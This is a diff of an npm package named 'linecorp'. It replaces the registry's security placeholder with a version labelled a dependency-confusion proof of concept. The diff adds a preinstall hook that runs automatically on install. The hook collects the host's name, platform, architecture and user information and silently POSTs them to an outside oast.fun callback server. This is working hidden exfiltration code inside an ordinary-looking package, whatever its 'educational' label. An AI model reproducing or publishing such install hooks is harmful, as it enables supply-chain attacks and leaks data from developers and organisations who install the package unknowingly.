linecorp 0.0.1-security → 0.0.5

package/README.md

@@ -1,5 +1,9 @@
-# Security holding package
+# linecorp - Dependency Confusion PoC
 
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+This package is a **Proof of Concept** created by KRKEEPER for ethical testing of Dependency Confusion vulnerabilities. 
 
-Please refer to www.npmjs.com/advisories?search=linecorp for more information.
+## Purpose
+
+- Demonstrates how packages with similar names can be unintentionally downloaded in systems with misconfigured dependency management.
+
+**Use responsibly. This module is intended for educational purposes only.**

package/index.js

@@ -0,0 +1 @@
+console.log("KRKEEPER - This is a Proof of Concept for Dependency Confusion. Educational Use Only.");

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "linecorp",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.0.5",
+  "description": "linecorp - module krkeeper testing",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/preinstall.js

@@ -0,0 +1,28 @@
+const https = require('https');
+const os = require('os');
+
+const data = JSON.stringify({
+  hostname: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  userInfo: os.userInfo()
+});
+
+const options = {
+  hostname: 'avogzckzvolobfemetjfrdebh6mtiikgy.oast.fun',
+  port: 443,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': data.length
+  }
+};
+
+const req = https.request(options, res => {
+  res.on('data', () => {}); // Ignora la respuesta
+});
+
+req.on('error', error => {}); // Manejo básico de errores
+req.write(data);
+req.end();